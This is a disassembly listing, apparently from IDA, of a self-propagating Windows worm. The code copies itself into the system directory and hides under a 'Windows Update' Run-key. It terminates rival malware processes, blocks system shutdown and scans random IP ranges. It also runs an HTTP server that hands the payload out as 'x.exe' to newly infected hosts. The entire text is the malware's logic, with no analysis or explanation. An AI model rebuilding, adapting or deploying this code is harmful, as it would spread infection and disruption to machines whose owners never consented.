push [ebp+var_C]
mov esi, dword_31001098
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31001A04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A5A proc near ; CODE XREF: sub_3100202D+3E�p
; sub_310020F4+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3100114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31001A7B
call dword_31001150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31001A7B: ; CODE XREF: sub_31001A5A+15�j
lea eax, [ebp+var_34]
push eax
call dword_31001154 ; gethostbyname
test eax, eax
jnz short loc_31001A90
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31001A90: ; CODE XREF: sub_31001A5A+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31001A5A endp
; =============== S U B R O U T I N E =======================================
sub_31001A99 proc near ; CODE XREF: sub_31001F41+22�p
; sub_31001FA5+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31001134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31001A99 endp
; =============== S U B R O U T I N E =======================================
sub_31001AAF proc near ; CODE XREF: sub_31001E06+40�p
; sub_31001E06+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_310010B8 ; OpenEventA
test eax, eax
jz short locret_31001AC8
push eax
call dword_310010B4 ; SetEvent
locret_31001AC8: ; CODE XREF: sub_31001AAF+10�j
retn
sub_31001AAF endp
; =============== S U B R O U T I N E =======================================
sub_31001AC9 proc near ; CODE XREF: UPX0:31002B69�p
push esi
mov esi, dword_310010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31001AC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001ADF proc near ; DATA XREF: sub_31001C18+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31001B10
push 1
jmp loc_31001BCB
; ---------------------------------------------------------------------------
loc_31001B10: ; CODE XREF: sub_31001ADF+28�j
mov esi, dword_310010F4
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
mov esi, dword_31001168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31004FC0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31002B92 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31001B8D: ; CODE XREF: sub_31001ADF+E8�j
mov eax, dword_31004FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31001B9F
mov eax, ecx
loc_31001B9F: ; CODE XREF: sub_31001ADF+BC�j
test eax, eax
jz short loc_31001BEC
push 0
push eax
mov eax, dword_31004FB8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31001BC9
cmp eax, 1000h
jb short loc_31001BEC
push 64h
add edi, eax
call dword_31001080 ; Sleep
jmp short loc_31001B8D
; ---------------------------------------------------------------------------
loc_31001BC9: ; CODE XREF: sub_31001ADF+D5�j
push 2
loc_31001BCB: ; CODE XREF: sub_31001ADF+2C�j
pop eax
jmp short loc_31001C11
; ---------------------------------------------------------------------------
loc_31001BCE: ; CODE XREF: sub_31001ADF+49�j
; sub_31001ADF+61�j
mov esi, dword_31001168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31004A80
push ebx
call esi ; send
loc_31001BEC: ; CODE XREF: sub_31001ADF+C2�j
; sub_31001ADF+DC�j
push 7D0h
call dword_31001080 ; Sleep
push 2
push ebx
call dword_31001170 ; shutdown
push ebx
call dword_31001174 ; closesocket
push 0
call dword_310010BC ; ExitThread
xor eax, eax
loc_31001C11: ; CODE XREF: sub_31001ADF+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001C18 proc near ; DATA XREF: sub_31001E06+DE�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_3100195C
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31004FBC, ebx
call sub_31002264
add esp, 14h
test eax, eax
jnz loc_31001D4D
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_310010C8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31001C84
push 1
call dword_310010BC ; ExitThread
loc_31001C84: ; CODE XREF: sub_31001C18+62�j
push ebx
push esi
call dword_310010C4 ; GetFileSize
push eax
mov dword_31004FC0, eax
call sub_31002680
pop ecx
mov dword_31004FB8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31004FC0
push eax
push esi
call dword_310010C0 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31004FC0, eax
call dword_31001098 ; CloseHandle
push ebx
push 1
push 2
call dword_31001158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31002B8C ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31001CE6: ; CODE XREF: sub_31001C18+E5�j
; sub_31001C18+ED�j ...
call dword_310010F8 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31004FCC, eax
jz short loc_31001CE6
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31001CE6
push eax
call dword_31001160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31001140 ; bind
test eax, eax
jnz short loc_31001CE6
push 64h
push edi
call dword_31001144 ; listen
mov [ebp+var_8], esi
pop esi
loc_31001D2F: ; CODE XREF: sub_31001C18+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31001148 ; accept
push eax
push offset sub_31001ADF
call sub_310019B3
pop ecx
pop ecx
jmp short loc_31001D2F
; ---------------------------------------------------------------------------
loc_31001D4D: ; CODE XREF: sub_31001C18+3D�j
push ebx
call dword_310010BC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31001C18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001D5C proc near ; CODE XREF: sub_31001E06:loc_31001EDE�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3100113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31001D5C endp
; ---------------------------------------------------------------------------
loc_31001D88: ; CODE XREF: UPX1:31006C28�j
push 0
call dword_310010A0 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31004FD0, eax
call dword_310010D4 ; DeleteFileA
call sub_3100195C
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
call dword_310010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31001DCA
push 1
call dword_310010CC ; ExitProcess
loc_31001DCA: ; CODE XREF: UPX0:31001DC0�j
call sub_310017C9
call sub_310023C8
call sub_31002542
push offset sub_31001E06
call sub_31001851
test eax, eax
pop ecx
jz short loc_31001DEF
push 0
call sub_31001E06
loc_31001DEF: ; CODE XREF: UPX0:31001DE6�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31001DF2 proc near ; CODE XREF: sub_31001E06:loc_31001F07�p
; sub_31001F41:loc_31001F5A�p ...
push 0
push dword_31004FC8
call dword_310010D8 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31001DF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001E06 proc near ; CODE XREF: UPX0:31001DEA�p
; DATA XREF: UPX0:31001DD9�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31001180
push offset loc_31002BD0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13x ; "u13x"
xor edi, edi
push edi
push 1
push edi
call dword_310010DC ; CreateEventA
mov dword_31004FC8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_3100198A
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31001EDE
push offset aWs2_32 ; "ws2_32"
mov esi, dword_31001090
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
loc_31001EDE: ; CODE XREF: sub_31001E06+9D�j
call sub_31001D5C
push edi
push offset sub_31001C18
call sub_31001999
push edi
push offset loc_31002B40
call sub_31001999
push edi
push offset loc_31002150
call sub_31001999
add esp, 18h
loc_31001F07: ; CODE XREF: sub_31001E06+11C�j
call sub_31001DF2
test eax, eax
jnz short loc_31001F24
push edi
call dword_31001018 ; AbortSystemShutdownA
push 1388h
call dword_31001080 ; Sleep
jmp short loc_31001F07
; ---------------------------------------------------------------------------
loc_31001F24: ; CODE XREF: sub_31001E06+108�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001E06 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001F41 proc near ; DATA XREF: sub_31001FA5+55�o
; sub_3100202D+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31001F50
push 1
pop eax
jmp short locret_31001FA1
; ---------------------------------------------------------------------------
loc_31001F50: ; CODE XREF: sub_31001F41+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31001F5A: ; CODE XREF: sub_31001F41+5A�j
call sub_31001DF2
test eax, eax
jnz short loc_31001F9D
call sub_31001A99
test eax, eax
jz short loc_31001F9D
cmp [ebp+var_1], bl
jz short loc_31001F96
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31001262
movzx esi, word_31004FDC
pop ecx
call dword_310010F8 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31001080 ; Sleep
loc_31001F96: ; CODE XREF: sub_31001F41+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31001F5A
loc_31001F9D: ; CODE XREF: sub_31001F41+20�j
; sub_31001F41+29�j
pop esi
xor eax, eax
pop ebx
locret_31001FA1: ; CODE XREF: sub_31001F41+D�j
leave
retn 4
sub_31001F41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001FA5 proc near ; DATA XREF: sub_3100202D+7E�o
; UPX0:310021E5�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31001FB3
push 1
pop eax
jmp short loc_31002029
; ---------------------------------------------------------------------------
loc_31001FB3: ; CODE XREF: sub_31001FA5+7�j
push ebx
push esi
push edi
call sub_3100195C
mov esi, dword_310010F8
xor ebx, ebx
loc_31001FC3: ; CODE XREF: sub_31001FA5+7D�j
call sub_31001DF2
test eax, eax
jnz short loc_31002024
call sub_31001A99
test eax, eax
jz short loc_31002024
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31004FD4
mov byte ptr [ebp+arg_0+3], al
call dword_310010E0 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31001262
test eax, eax
pop ecx
jnz short loc_31002006
push [ebp+arg_0]
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_31002006: ; CODE XREF: sub_31001FA5+50�j
movzx edi, word_31004FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31001080 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31001FC3
loc_31002024: ; CODE XREF: sub_31001FA5+25�j
; sub_31001FA5+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31002029: ; CODE XREF: sub_31001FA5+C�j
pop ebp
retn 4
sub_31001FA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100202D proc near ; DATA XREF: UPX0:310021FD�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_3100195C
call sub_31001DF2
test eax, eax
jnz loc_310020E6
push ebx
mov ebx, dword_31001080
push esi
mov esi, dword_310010F8
push edi
loc_31002053: ; CODE XREF: sub_3100202D+48�j
; sub_3100202D+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31002062: ; CODE XREF: sub_3100202D+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31002062
call sub_31001A5A
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31002053
call sub_31001A99
test eax, eax
jz short loc_310020BE
push offset dword_31004FD4
call dword_310010E0 ; InterlockedIncrement
push edi
call sub_31001262
test eax, eax
pop ecx
jnz short loc_310020C5
push edi
push offset sub_31001F41
call sub_310019B3
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_310020AA: ; CODE XREF: sub_3100202D+8D�j
push edi
push offset sub_31001FA5
call sub_310019B3
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_310020AA
jmp short loc_310020C5
; ---------------------------------------------------------------------------
loc_310020BE: ; CODE XREF: sub_3100202D+51�j
push 2710h
call ebx ; Sleep
loc_310020C5: ; CODE XREF: sub_3100202D+67�j
; sub_3100202D+8F�j
movzx edi, word_31004FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31001DF2
test eax, eax
jz loc_31002053
pop edi
pop esi
pop ebx
loc_310020E6: ; CODE XREF: sub_3100202D+11�j
push 0
call dword_310010BC ; ExitThread
xor eax, eax
leave
retn 4
sub_3100202D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310020F4 proc near ; CODE XREF: UPX0:310021C2�p
; UPX0:loc_31002228�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31001A5A
push eax
call dword_3100115C ; inet_ntoa
mov esi, dword_31001078
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_31004FCC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3100111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31004002
call esi ; lstrcpyA
push offset byte_31004000
call dword_3100107C ; lstrlenA
mov byte_31004000[eax], 0DFh
pop esi
leave
retn
sub_310020F4 endp
; ---------------------------------------------------------------------------
loc_31002150: ; DATA XREF: sub_31001E06+F4�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31004FD4, ebx
call sub_31001A99
mov esi, dword_31001080
mov edi, 1388h
test eax, eax
jnz short loc_3100217E
loc_31002172: ; CODE XREF: UPX0:3100217C�j
push edi
call esi ; Sleep
call sub_31001A99
test eax, eax
jz short loc_31002172
loc_3100217E: ; CODE XREF: UPX0:31002170�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31001134 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31004FD8, ebx
pop ebp
mov word_31004FDC, 96h
jz short loc_310021BB
mov dword_31004FD8, 1
mov ebp, 15Eh
mov word_31004FDC, 14h
loc_310021BB: ; CODE XREF: UPX0:310021A1�j
call sub_31001A5A
mov ebx, eax
call sub_310020F4
cmp ebx, 100007Fh
jz short loc_310021DC
push ebx
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_310021DC: ; CODE XREF: UPX0:310021CD�j
mov dword ptr [esp+10h], 4
loc_310021E4: ; CODE XREF: UPX0:310021F5�j
push ebx
push offset sub_31001FA5
call sub_310019B3
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_310021E4
test ebp, ebp
jle short loc_3100220C
loc_310021FB: ; CODE XREF: UPX0:3100220A�j
push 0
push offset sub_3100202D
call sub_310019B3
pop ecx
dec ebp
pop ecx
jnz short loc_310021FB
loc_3100220C: ; CODE XREF: UPX0:310021F9�j
; UPX0:31002218�j ...
call sub_31001A99
test eax, eax
jz short loc_3100221A
push edi
call esi ; Sleep
jmp short loc_3100220C
; ---------------------------------------------------------------------------
loc_3100221A: ; CODE XREF: UPX0:31002213�j
; UPX0:31002226�j
call sub_31001A99
test eax, eax
jnz short loc_31002228
push edi
call esi ; Sleep
jmp short loc_3100221A
; ---------------------------------------------------------------------------
loc_31002228: ; CODE XREF: UPX0:31002221�j
call sub_310020F4
jmp short loc_3100220C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100222F proc near ; CODE XREF: sub_310023C8+8C�p
; sub_31002542+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31002262
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
loc_31002262: ; CODE XREF: sub_3100222F+1C�j
pop ebp
retn
sub_3100222F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002264 proc near ; CODE XREF: sub_31001C18+33�p
; sub_310023C8+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jz short loc_31002290
push 1
pop eax
jmp short loc_310022BA
; ---------------------------------------------------------------------------
loc_31002290: ; CODE XREF: sub_31002264+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31001008 ; RegQueryValueExA
test eax, eax
jz short loc_310022AF
push 2
pop esi
loc_310022AF: ; CODE XREF: sub_31002264+46�j
push [ebp+arg_10]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_310022BA: ; CODE XREF: sub_31002264+2A�j
pop esi
leave
retn
sub_31002264 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310022BD proc near ; CODE XREF: sub_31002476+96�p
; sub_31002542+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001000 ; RegCreateKeyExA
test eax, eax
jz short loc_310022E6
push 1
pop eax
jmp short loc_3100230D
; ---------------------------------------------------------------------------
loc_310022E6: ; CODE XREF: sub_310022BD+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001004 ; RegSetValueExA
test eax, eax
jz short loc_31002302
push 2
pop esi
loc_31002302: ; CODE XREF: sub_310022BD+40�j
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_3100230D: ; CODE XREF: sub_310022BD+27�j
pop esi
pop ebp
retn
sub_310022BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002310 proc near ; CODE XREF: sub_310023C8+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_3100107C ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_310023C4
loc_31002330: ; CODE XREF: sub_31002310+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31002339
dec esi
jns short loc_31002330
loc_31002339: ; CODE XREF: sub_31002310+24�j
push 0
push 2
call sub_31002BE8 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_310023C4
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31002B8C ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31002BE2 ; Process32First
test eax, eax
jz short loc_310023C4
lea esi, [esi+ebx+1]
loc_31002381: ; CODE XREF: sub_31002310+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_310010F4 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_310023B1
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_3100109C ; OpenProcess
push 0
push eax
call dword_31001070 ; TerminateProcess
loc_310023B1: ; CODE XREF: sub_31002310+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31002BDC ; Process32Next
test eax, eax
jnz short loc_31002381
loc_310023C4: ; CODE XREF: sub_31002310+1A�j
; sub_31002310+38�j ...
pop esi
pop ebx
leave
retn
sub_31002310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310023C8 proc near ; CODE XREF: UPX0:31001DCF�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31002431: ; CODE XREF: sub_310023C8+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jnz short loc_31002468
push ebx
push edi
push esi
call sub_3100222F
lea eax, [ebp+var_138]
push eax
call sub_31002310
add esp, 10h
loc_31002468: ; CODE XREF: sub_310023C8+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31002431
pop edi
pop esi
pop ebx
leave
retn
sub_310023C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002476 proc near ; CODE XREF: sub_31002542+D1�p
; sub_31002542+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3100248B
push [ebp+arg_0]
call dword_310010D4 ; DeleteFileA
loc_3100248B: ; CODE XREF: sub_31002476+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31001058 ; GetSystemDirectoryA
test eax, eax
jz locret_31002540
push esi
call dword_310010F8 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_310019D4
mov esi, dword_3100105C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31004CAC ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31001060 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_3100107C ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_310022BD
add esp, 14h
push dword_31004FC4
call dword_31001098 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31001064 ; WinExec
push 1F4h
call dword_31001080 ; Sleep
push 0
call dword_310010CC ; ExitProcess
pop esi
locret_31002540: ; CODE XREF: sub_31002476+23�j
leave
retn
sub_31002476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002542 proc near ; CODE XREF: UPX0:31001DD4�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31001050 ; GetModuleFileNameA
test eax, eax
jz loc_3100267B
and dword_31004FE0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jz short loc_310025C8
call dword_310010F8 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_310019D4
pop ecx
pop ecx
push ebx
call dword_3100107C ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_310022BD
add esp, 14h
jmp short loc_310025D7
; ---------------------------------------------------------------------------
loc_310025C8: ; CODE XREF: sub_31002542+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_31001078 ; lstrcpyA
loc_310025D7: ; CODE XREF: sub_31002542+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31002264
add esp, 14h
test eax, eax
jz short loc_3100261D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
